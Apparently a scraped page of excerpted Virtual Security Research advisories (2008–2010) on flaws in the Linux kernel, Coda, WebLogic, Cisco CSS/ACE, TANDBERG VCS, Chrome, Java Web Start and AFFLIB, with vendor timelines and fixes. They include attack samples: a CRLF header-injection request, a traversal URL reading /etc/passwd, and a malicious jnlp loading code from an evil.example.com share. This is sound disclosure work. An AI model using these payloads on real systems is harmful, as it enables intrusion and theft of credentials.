2010-12-20CVE assigned 2010-12-21VSR releases advisory. The Citrix advisory may be obtained at: http://support.citrix.com/article/CTX127613 Recommendation -- Citrix has indicated that this vulnerability only affects legacy NT4 authentication which has been removed from the latest release of the device firmware. Common Vulnerabilities and Exposures (CVE) Information -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-4566 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes
VSR Advisories: Linux RDS Protocol Local Privilege Escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Linux RDS Protocol Local Privilege Escalation Release Date: 2010-10-19 Application: Linux Kernel Versions: 2.6.30 - 2.6.36-rc8 Severity: High Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com Vendor Status: Patch Released [3] CVE Candidate: CVE-2010-3904 Reference: http://www.vsecurity.com/resources/advisory/20101019-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: Linux is a free Unix-type operating system originally created by Linus Torvalds with the assistance of developers around the world. Developed under the GNU General Public License, the source code for Linux is freely available to everyone. - From [2]: Reliable Datagram Sockets (RDS) provide in order, non-duplicating, highly available, low overhead, reliable delivery of datagrams between hundreds of thousands of non-connected endpoints. Vulnerability Overview - -- On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write abritrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root. Vulnerability Details - - On Linux, recvmsg() style socket calls are performed using iovec structs, which allow a user to specify a base address and size for a buffer used to receive socket data. Each packet family is responsible for defining functions that copy socket data, which is received by the kernel, back to user space to allow user programs to process and handle received network data. When performing this copying of data to user space, the RDS protocol failed to verify that the base address of a user-provided iovec struct pointed to a valid userspace address before using the __copy_to_user_inatomic() function to copy the data. As a result, by providing a kernel address as an iovec base and issuing a recvmsg() style socket call, a local user could write arbitrary data into kernel memory. This can be leveraged to escalate privileges to root. Proof-of-Concept Exploit - VSR has developed a proof-of-concept exploit [4] to both demonstrate the severity of this issue as well as allow users and administrators to verify the existence of the vulnerability. The exploit leverages the ability to write into kernel memory to reset the kernel's security operations structure and gain root privileges. The exploit requires that kernel symbol resolution is available to unprivileged users, via /proc/kallsyms or similar, as is the case on most stock distributions. It has been tested on both 32-bit and 64-bit x86 platforms. While this exploit has been reliable during testing, it is not advised to run kernel exploits on production systems, as there is a risk of causing system instability and crashing the affected machine. Versions Affected - - This vulnerability affects unpatched versions of the Linux kernel, starting from 2.6.30, where the RDS protocol was first included. Installations are only vulnerable if the CONFIG_RDS kernel configuration option is set, and if there are no restrictions on unprivileged users loading packet family modules, as is the case on most stock distributions. Vendor Response - --- The following timeline details Linux's response to the reported issue. 2010-10-13Vulnerability reported to Linux security team 2010-10-13Response, agreement on disclosure date 2010-10-19Fix publicly committed [3] 2010-10-19Coordinated disclosure Recommendation - -- Users should either install updates provided by downstream distributions, or apply the committed patch [3] and recompile their kernel. Common Vulnerabilities and Exposures (CVE) Information - -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-3904 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements - Thanks to Andrew Morton, Linus Torvalds, Andy Grover, and Eugene Teo for their prompt responses and patch. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Linux kernel http://www.linux.org 2. Reliable Datagram Sockets
CVE-2010-3014: Coda Filesystem Kernel Memory Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Coda Filesystem Kernel Memory Disclosure Release Date: 2010-08-16 Application: Coda kernel module for NetBSD and FreeBSD Versions: All known versions Severity: Medium Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com Vendor Status: Patch Released [2][3] CVE Candidate: CVE-2010-3014 Reference: http://www.vsecurity.com/resources/advisory/20100816-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: Coda is a distributed filesystem with its origin in AFS2. It has many features that are very desirable for network filesystems. Currently, Coda has several features not found elsewhere. 1. disconnected operation for mobile computing 2. is freely available under a liberal license 3. high performance through client side persistent caching 4. server replication 5. security model for authentication, encryption and access control 6. continued operation during partial network failures in server network 7. network bandwidth adaptation 8. good scalability 9. well defined semantics of sharing, even in the presence of nework failure Vulnerability Overview - -- On July 19th, VSR identified a vulnerability in the Coda filesystem kernel module, as implemented for FreeBSD and NetBSD. By sending a specially crafted ioctl request to a mounted Coda filesystem, an unprivileged local user could read large portions of kernel heap memory, leading to the disclosure of potentially sensitive information. Product Background - -- Coda is implemented as a kernel filesystem module with userland components. System calls involving file I/O are passed to the Coda kernel module, which in turn passes the request to the userland Venus cache manager via a character device. Venus answers the request by checking its cache or requesting content from the Coda server. Coda implements most standard filesystem operations, including providing an ioctl interface. Vulnerability Details - - Coda ioctls are passed through the Coda filesystem module before being sent to Venus. The arguments to a Coda ioctl are encapsulated in a PioctlData struct, which in turn contains a ViceIoctl struct. The ViceIoctl struct contains in_size and out_size fields, dictating the expected size of the input and output data corresponding to a particular ioctl request. The in_size field is validated to prevent memory corruption via copying an unexpected amount of data from userspace into a kernel buffer. However, the out_size field was missing this validation. When copying the output data of an ioctl request back to userspace, the out_size field was used to determine the amount of data to copy, without restricting it to a maximum possible size. By specifying a large value for this field, the contents of the kernel heap beyond the data intended to be returned to the user would be copied into a userland buffer. An unprivileged user could exploit this to read large portions of the kernel heap, potentially disclosing sensitive information. Versions Affected - - This vulnerability affects all known versions of the Coda filesystem module as included in FreeBSD and NetBSD. The Linux Coda module is not affected. Vendor Response - --- The following timeline details FreeBSD's and NetBSD's response to the reported issue: 2010-07-19Vulnerability reported to FreeBSD and NetBSD 2010-07-20Fix committed by NetBSD [2] 2010-07-21Response from FreeBSD 2010-07-21FreeBSD and NetBSD provided a draft advisory 2010-08-05Fix committed by FreeBSD [3] 2010-08-16Coordinated disclosure Recommendation - -- Coda users should apply the updates committed by NetBSD [2] and FreeBSD[3]. Common Vulnerabilities and Exposures (CVE) Information - -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-3014 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements - Thanks to the FreeBSD and NetBSD security teams for their prompt responses. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Coda File System http://www.coda.cs.cmu.edu 2. Coda module in NetBSD CVS http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/coda/?only_with_tag=MAIN 3. FreeBSD SVN revision 210997 http://svn.freebsd.org/viewvc/base?view=revisionrevision=210997 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This advisory is
CVE-2010-2375: WebLogic Plugin HTTP Injection via Encoded URLs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: WebLogic Plugin HTTP Injection via Encoded URLs Release Date: 2010-07-13 Application: WebLogic Plugin Versions: All known versions Severity: High Discovered by: Timothy D. Morgan tmorgan (at) vsecurity {dot} com Contributors: George D. Gal ggal {at} vsecurity (dot) com Vendor Status: Patch Released [4] CVE Candidate: CVE-2010-2375 Reference: http://www.vsecurity.com/resources/advisory/20100713-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- The product is best described by Oracle marketing literature in: Oracle WebLogic Server Enterprise Edition offers enterprises the ability to consolidate their applications on a pool of shared servers for both high efficiency and superior performance. No other application server has the proven performance on industry benchmarks across the most varied chip types and operating systems. Sophisticated High Availability (HA) features built on clustered instances ensure uptime. Easy-to-use yet substantial management tools keep systems going without hassle or expense. By coalescing applications and services onto Oracle WebLogic Server, IT is in position to react swiftly to change and help the enterprise outperform the competition. -- [1] And: Oracle WebLogic Server Web Server Plugins provide load balancing across WebLogic Server Clusters by acting as front-end proxies. While WebLogic Server Web Server Plugins 1.0 are bundled with WebLogic Server, these new WebLogic Server Web Server Plugins 1.1 are downloadable separately outside of WebLogic Server and deliver enhanced functionality and improved security. -- [2] Vulnerability Overview - -- Over the last several years, VSR analysts had observed unusual behavior in multiple WebLogic deployments when certain special characters were URL encoded and appended to URLs. In late April, 2010 VSR began researching this more in depth and found that the issue could allow for HTTP header injection and HTTP request smuggling attacks. Product Background - -- WebLogic application server is commonly deployed in a three-tier architecture where the application server resides behind a public-facing web server. Oracle provides proprietary web server plugin modules for multiple web server software packages on various platforms in order to allow these services to act as reverse proxies and in some cases, load balancers for multiple middle-tier WebLogic application servers. Vulnerability Overview - -- The vulnerability stems from the web server plugin's processing of URLs submitted by users. When a URL is received, it is URL decoded at some point, but is not re-encoded prior to inclusion in requests to the middle-tier WebLogic server. This allows for special characters, such as new lines, to be injected into requests directed at application servers. For instance, if an attacker were to send the following simple request: GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1 Host: vulnerable.example.com Connection: close The web server proxy module would instead send a request on to the application server which looks more like: GET /logo.gif HTTP/1.1 X-hdr: x HTTP/1.1 Host: vulnerable.example.com Connection: close This behavior allows for a wide variety of attacks, including trusted header injection and HTTP request smuggling. Attack Scenarios - In the simplest scenarios, an attacker could use this flaw to inject malicious versions of headers which are considered trusted. In certain situations, headers are added to requests by the web server proxy module which may be used to make decisions about authentication or access control. For instance, the WL-Proxy-Client-IP header is added to requests to indicate to the application server which IP address the client used. If the application server uses this to enforce IP-based access control restrictions, then clearly this injection vulnerability could be used to bypass this restriction. Another example would be the injection of a WL-Proxy-Client-Cert header. This header is used in deployments where clients are provided SSL/TLS client certificates for authentication. Since web servers would typically terminate this encrypted communication, application servers need a way of identifying the user who was authenticated. The WL-Proxy-Client-Cert header is used to communicate this information between the web server plugin and application servers. By injecting a false version of this header, it would be possible to impersonate other users and perhaps avoid presenting a client certificate at all. More complex attacks are also possible by
VSR Advisory: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities
Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities Release Date: 2010-07-02 Application: Cisco Content Services Switch (CSS) / ACE Products Versions: Cisco CSS 11500 - 08.20.1.01 Cisco ACE 4710 - Version A3(2.5) [build 3.0(0)A3(2.5) (Other versions may be affected) Severity: High (in specific configurations) Author: George D. Gal ggal (a) vsecurity . com Vendor Status: Cisco CSS vulnerability remains unpatched, workarounds available Cisco ACE workarounds available CVE Candidate: CVE-2010-1575 - Certificate Spoofing Flaw CVE-2010-1576 - HTTP Request Parsing Flaw Reference: http://www.vsecurity.com/resources/advisory/20100702-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- From [1]: The Cisco CSS 11500 Series Content Services Switch is a high-performance, high-availability modular architecture for Web infrastructures. As the premiere switch for the Cisco Web Network Services Software, the Cisco CSS 11500 Series helps businesses to build global Web networks optimized for content delivery and e-commerce. By activating HTTP headers, the CSS 11500 Series helps to ensure availability, optimize utilization, reduce latency, increase scalability, and enhance security for Websites, server farms, cache clusters, and firewall systems. From [2]: Cisco(R) ACE Application Control Engine application switches represent the state of the art in next-generation application switches for increasing the availability, performance, and security of data center applications. The Cisco ACE family of application switches includes the Cisco ACE Service Module for the Cisco Catalyst(R) 6500 Series Switches and Cisco 7600 Series Routers, as well as the Cisco ACE 4710 Appliance in a standalone form factor for discrete data center deployments. Vulnerability Overview -- On June 4th 2009, VSR identified multiple weaknesses in the Cisco CSS 11500's handling of HTTP header interpretation and client-side SSL certificates. Individually, these issues may be considered minor, but combined they could allow for the compromise of an application that relies on a vulnerable CSS to assist in authenticating clients. If successfully exploited, an attacker could spoof another application user's identity without possession of the victim's client certificate. Additionally, due to the fact that the Cisco CSS product has been effectively superceded by the Cisco ACE, VSR has also identified similar issues to those described below in the ACE in particular configurations. These issues may affect any CSS installation, but would have the greatest impact on deployments that have the following feature enabled in the configuration: ssl-server context http-header client-cert Similarly, on the Cisco ACE, these issues may manifest themselves when using a policy map with a class-default class, as shown below: policy-map type loadbalance first-match SLB-VIP-REDIRECT class class-default serverfarm TEST-FARM action DO-SOMETHING-WITH-HEADERS insert-http X-SRC-IP header-value %is Issue 1: Weak Enforcement of Authority in HTTP Certificate Headers -- Cisco Bug Id - CSCSZ04690 Affects - Cisco CSS The first weakness affecting the Cisco CSS is that, in a typical client certificate configuration, HTTP clients may confuse web applications by injecting their own certificate headers. When utilizing the CSS to terminate SSL communications, SSL client certificates are first authenticated by the CSS. From there, the CSS will normally pass the client's identity to the back-end web server in the form of several HTTP headers as shown below: ClientCert-Subject: XXX ClientCert-Subject-CN: XXX ClientCert-Fingerprint: XXX ClientCert-Subject-CN: XXX ClientCert-Issuer-CN: XXX ClientCert-Certificate-Version: XXX ClientCert-Serial-Number: XXX ClientCert-Data-Signature-Algorithm: XXX ClientCert-Subject: XXX ClientCert-Issuer: XXX ClientCert-Not-Before: XXX ClientCert-Not-After: XXX ClientCert-Public-Key-Algorithm: XXX ClientCert-RSA-Modulus-Size: XXX ClientCert-RSA-Modulus: XXX ClientCert-RSA-Exponent: XXX ClientCert-X509v3-Subject-Key-Identifier: XXX ClientCert-X509v3-Authority-Key-Identifier: XXX ClientCert-Signature-Algorithm: XXX ClientCert-Signature: XXX However, there is no attempt by the CSS to prevent clients from supplying their own ClientCert-* headers. Depending on how application developers handle multiple copies of these headers, an attacker may be able to impersonate other users. For
CVE-2009-4510: TANDBERG VCS Static SSH Host Keys
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Static SSH Host Keys Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.3.0, x4.2.1, and possibly earlier Severity: High Discovered by: Jon Hart Advisory by: Timothy D. Morgan tmorgan (a) vsecurity . com Vendor Status: Firmware version x5.1.1 released [2]. CVE Candidate: CVE-2009-4510 Reference: http://www.vsecurity.com/resources/advisory/20100409-2/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks. Vulnerability Overview - -- On December 2nd, VSR identified a SSH service authentication weakness vulnerability in the TANDBERG's Video Communication Server. This issue would allow an attacker with privileged network access to conduct server impersonation and man-in-the-middle attacks on administrator SSH sessions. Successful attacks could yield shell access to vulnerable appliances. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides several system shell accounts accessible via the SSH protocol. Vulnerability Details - - The TANDBERG VCS appliance is deployed by default with a DSA ssh key pair stored in files: /tandberg/sshkeys/ssh_host_dsa_key /tandberg/sshkeys/ssh_host_dsa_key.pub In tested versions of the firmware, this default key has a fingerprint of: 49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8 No new key is generated upon installation. In addition, this default key would overwrite any SSH server keys, if installed by security-conscious administrators previously, during a firmware upgrade. Due to the public nature of this key (see firmware downloads [2]) an attacker would be able to conduct server impersonation and man-in-the-middle attacks on SSH connections directed at any TANDBERG VCS device. A successful exploit would most likely yield an attacker shell access to the device with privileges of the victim client. Versions Affected - - VSR has observed this vulnerability in version x4.2.1. Based on preliminary analysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also appear to be vulnerable. Earlier versions have not been tested. Vendor Response - --- The following timeline details TANDBERG's response to the reported issue: 2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately. 2009-12-22VSR provided TANDBERG a draft advisory. 2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware, but this did not appear to correct the issue. 2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware, but this did not appear to correct the issue for existing installations, since old vulnerable keys would be preserved. 2010-01-28TANDBERG explained that changing SSH keys automatically on administrators may cause backward compatibility problems. Therefore, TANDBERG decided to preserve old keys even when upgrading a system which contains a vulnerable key. Administrators will instead be warned in the web console that a vulnerable key is in use and will be expected to update host keys manually. 2010-03-26TANDBERG provided VSR with a release candidate firmware for version x5.1.1. 2010-04-07TANDBERG VCS firmware version x5.1.1 released [2]. 2010-04-09VSR advisory released. Recommendation - -- Immediately replace the current SSH host key with a new one. This may be accomplished through one of several methods. One approach is to simply log in to the device locally and use the ssh-keygen utility to replace the keys stored in /tandberg/sshkeys/. Consult TANDBERG documentation for other methods. After replacing the SSH host keys, it is recommended that the VCS firmware be upgraded to X5.1.1 as soon as possible. NOTE: Upgrading or downgrading to versions prior to X5.1.1 will cause any custom SSH host keys to be overwritten. Version X5.1.1 and later should preserve any custom host keys previously installed. As a precaution, after
CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.3.0, x4.2.1, and possibly earlier Severity: Medium Discovered by: Jon Hart Advisory by: Timothy D. Morgan tmorgan (a) vsecurity . com Vendor Status: Firmware update released [2] CVE Candidate: CVE-2009-4511 Reference: http://www.vsecurity.com/resources/advisory/20100409-3/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks. Vulnerability Overview - -- On December 3rd, VSR identified a directory traversal and file retrieval vulnerability in the TANDBERG's Video Communication Server. This issue would allow an authenticated attacker (who has access as an administrator or less privileged user on the web administration interface) to retrieve files from the filesystem which are readable by the nobody system user. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides a web-based management interface implemented in PHP which allows administrators to perform a wide variety of actions, including configuration of the device, management of user accounts, firmware updates, along with number of other items. Vulnerability Details - - The TANDBERG VCS web management interface provides two nearly identical scripts at URLs: https://vulnerable.example.com/helppage.php https://vulnerable.example.com/user/helppage.php These help pages accept a file parameter in the URL which can be used to retrieve nearly arbitrary files from the filesystem. The relevant source code for these pages is as follows: // The following is Copyright (C) 2009 TANDBERG // ... // Grab the content before we write anything: we'll need it for the title tag in the head // Dig out the page title, from the title tag, // then remove any surround in the page as we add our own... $filename = $this-helpPagePath . $_GET['page'] . $this-helpPageSuffix; if (! file_exists($filename)) { $helpHTML = There is no help available for the . $_GET['page'] . pagebr/; $pageTitle = $_GET['page']; }else{ $helpHTML = file_get_contents($filename); ... echo \n!-- ** --\n; echo $helpHTML; echo !-- ** --\n; ... // end of excerpt // Here, the final path string ($filename) loaded and displayed to the user is prepended with a directory and appended with a file extension. Using simple directory traversal techniques (../) it is possible to traverse to any directory on the filesystem. Using a trailing NUL byte encoded in the URL (%00) it is also possible to truncate the file path to eliminate the file extension. For instance, the following URL retrieves the /etc/passwd file: https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00 During testing, it was found that the x4.2.1 firmware runs the web server as the nobody user, which somewhat limits the amount of sensitive information that may be obtained. However, since shadowed passwords were not configured, it was possible to retrieve all local system users' password hashes from /etc/passwd. Additional password hashes are available in /tandberg/persistent/etc/digest. Versions Affected - - VSR has successfully exploited this issue in firmware version x4.2.1. Based on preliminary source code analysis[2], versions x4.3.0 and x5.0 also appear to be vulnerable. Earlier versions have not been tested. Vendor Response - --- The following timeline details TANDBERG's response to the reported issue: 2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately. 2009-12-22VSR provided TANDBERG a draft advisory. 2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware, but this did not appear to correct the issue (based on PHP code analysis alone). 2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware for testing which appeared to correct the vulnerability. 2010-03-26TANDBERG provided VSR with a release candidate firmware for version x5.1.1. 2010-04-07TANDBERG
Chrome Password Manager Cross Origin Weakness (CVE-2010-0556)
Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Chrome Password Manager Cross Origin Weakness Release Date: 2010-02-15 Application: Google Chrome Web Browser Versions: 4.0.249.78, 3.0.195.38, and likely earlier Severity: Medium/Low Author: Timothy D. Morgan tmorgan (a) vsecurity . com Vendor Status: Update Released [2] CVE Candidate: CVE-2010-0556 Reference: http://www.vsecurity.com/resources/advisory/20100215-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- Google Chrome is a web browser that runs web pages and applications with lightning speed. [1] Vulnerability Overview -- In mid-January, VSR identified a vulnerability in Google Chrome which could be used in phishing attacks in specific types of web sites. This issue may make it much easier to convince a victim to submit web application credentials to the attacker's site. Vulnerability Details - As with many modern browsers, Google Chrome implements a password manager to help users keep track of credentials used on various web sites. It may be used to store either HTTP authentication credentials or form-based credentials. The vulnerability surfaces in a situation where a user visits a web page which includes an embedded object, such as an image, from a third-party site. If an attacker had control of the third-party web server, he could request credentials from the user via HTTP authentication. This style of attack has been documented in the past, and some of variations on this theme are explored in a recent paper by VSR [5]. However, in the case of vulnerable versions of Google Chrome, the password manager may pre-fill the authentication dialog box with credentials intended for parent page's domain, leaving users one click away from account compromise. This issue would affect Chrome users which use applications that allow users to embed objects from third parties. Examples of such applications may include message boards, blogs, or social networking sites. The following steps may be used to reproduce the issue: 1. Set up an HTML page with the following contents: htmlbody img src=http://evil.example.com/image.png; / /body/html This page should not be protected by any authentication and should be hosted at: http://victim.example.org/test-img.html 2. Set up an HTTP digest protected area under the following URL: http://victim.example.org/private/ 3. Set up the attacker's server to be protected by HTTP authentication such that the following URL is protected: http://evil.example.com/image.png 4. Use Google Chrome to log in to an area protected with HTTP authentication, such as: http://victim.example.org/private Save the password in the password manager. 5. Finally, access the unauthenticated HTML page on the victim's server: http://victim.example.org/test-img.html Since the embedded image requires authentication, a password prompt should appear. In vulnerable versions of Google Chrome, this form will be pre-filled with the stored credentials from the victim.example.org domain, even though the password prompt is generated by evil.example.com. Versions Affected - The issue was originally discovered in version 3.0.195.38 and was also verified to exist in version 4.0.249.78. Testing was conducted on the Windows platform. Vendor Response --- The following timeline details Google's response to the reported issue: 2010-01-20VSR submitted a security bug report [3]. Chromium development team began researching the issue. 2010-01-21VSR provided additional details on the test scenario. Chromium developers successfully reproduced the issue and committed a fix to the source repository [4]. 2010-02-10Chrome stable version 4.0.249.89 released which includes the fix. 2010-02-15VSR advisory released. Recommendation -- Upgrade to the latest version of Google Chrome as soon as possible. Users are advised to be wary of HTTP authentication prompts and to carefully inspect the domains presented in these messages to see if they match the domain of the expected site. Common Vulnerabilities and Exposures (CVE) Information -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-0556 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements Thanks to the Chromium development team for the prompt response.
CVE-2008-2086: Java Web Start File Inclusion via System Properties Override
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Java Web Start File Inclusion via System Properties Override Release Date: 2008-12-03 Application: Sun Java Runtime Environment / Java Web Start Versions: See below Severity: High Author: Timothy D. Morgan tmorgan {a} vsecurity.com Vendor Status: Patch Released [3] CVE Candidate: CVE-2008-2086 Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: Using Java Web Start technology, standalone Java software applications can be deployed with a single click over the network. Java Web Start ensures the most current version of the application will be deployed, as well as the correct version of the Java Runtime Environment (JRE). Vulnerability Overview - -- On March 27th, VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site. Product Background - -- Java Web Start (JWS) applications are launched through specially formatted XML files hosted on web sites with a jnlp file extension. These files reference one or more jar files which are meant to be downloaded and executed by client systems. JWS applications are run in unprivileged mode by default but may be run with full user privileges if the jnlp file requests this access. Privileged JWS applications must have each jar file signed by the same trusted author in order to be executed. However, jnlp files are not signed and may be hosted by third-party web sites. In addition to specifying application components, the jnlp specification permits application authors to supply certain System properties which may be retrieved by the application through the System.getProperty() and System.getProperties() methods. Besides any user-supplied properties, the Java VM also provides access to a number of sensitive runtime settings through this interface. More information on the jnlp format may be found in [2]. Vulnerability Details - - VSR discovered an unsafe behavior in the way properties are interpreted when specified in jnlp files. In certain versions of the Java Runtime Engine (JRE), values supplied through jnlp files override existing system defaults. Thus far, VSR has verified the following System properties may be overridden: java.home java.ext.dirs user.home Of particular interest are the java.home and java.ext.dirs properties. If an attacker could lure a victim to open a malicious jnlp file which references a trusted application, it may be executed without any confirmation by the user. However, as the application attempts to load classes, it may trust the malicous java.home and/or java.ext.dirs value. These paths could point to a malicious local or remote JRE or extensions installation. It appears that under Windows, UNC network paths may be used for the java.home value. It is not yet known whether or not UNC paths may be used for java.ext.dirs. During testing, VSR found that Java Cryptography Extension (JCE) classes failed to load when java.home was set to an invalid path. However, by setting this path to network share which hosted a valid JRE installation, the JCE classes loaded correctly. If such a network share were hosted by the attacker, then arbitrary code could potentially be loaded without restrictions, unbeknownst to the victim. The following XML shows what a malicious jnlp file might look like. Note that the malicious jnlp file would likely be very similar to the ones users normally rely on with certain properties overriden in the resources section. jnlp spec=1.0+ codebase=http://trusted.example.org/; href=evil.jnlp information titleTrusted Application/title vendorTrusted Vendor/vendor descriptionTrusted Application by Trusted Vendor/description homepage href=http://trusted.example.org/; / offline-allowed / /information securityall-permissions //security resources j2se version=1.5+ / !-- Next line overrides the JRE's java.home System property -- property name=java.home value=\\evil.example.com\jre / jar href=signed-and-trusted-jce-dependent-library.jar / /resources application-desc main-class=org.example.trusted.app.StartApp / /jnlp To fully exploit this specific attack vector, an attacker would need to remotely or locally host a malicious version of classes used by a trusted application and then lure a user into opening a malicious jnlp
AFFLIB(TM): Multiple Buffer Overflows
(path,fn+match[2].rm_so,match[2].rm_eo-match[2].rm_so); The overflow occurs because the length specified to memcpy() is the length of the regular expression match, without regard to the size of the path buffer. This may be exploitable in scenarios where an attacker could pass command line parameters to a privileged aimage program, or via a program written by a third-party developer. * Stack-based Buffer Overflow in libewf Vnode Wrapper * File: lib/vnode_ewf.cpp Line: 70 Description: A potentially untrustworthy parameter is used without length checking in a strcpy() call which writes to a stack-based buffer. If this command receives parameters from an untrusted source, code execution would be a major risk. Lines 59-70 are included to illustrate the problem: static int ewf_open(AFFILE *af) { if(strchr(af-fname,'.')==0) return -1; // need a '.' in the filename /* See how many files there are to open */ char **files = (char **)malloc(sizeof(char *)); int nfiles = 1; files[0] = strdup(af-fname); char fname[MAXPATHLEN+1]; strcpy(fname,af-fname); An overflow could occur because the af-fname string is provided by the user, and is not limited to MAXPATHLEN. An attacker could use this in scenarios where a 3rd-party program incorporates AFFLIB(TM) into their program (which ultimately accepts file names from an untrusted source) or in situations where an AFFLIB(TM) binary is setuid/setgid or is executed remotely web applications. * Stack-based Buffer Overflow in AFD Vnode Wrapper * File: lib/vnode_afd.cpp Line: 405 Description: A potentially 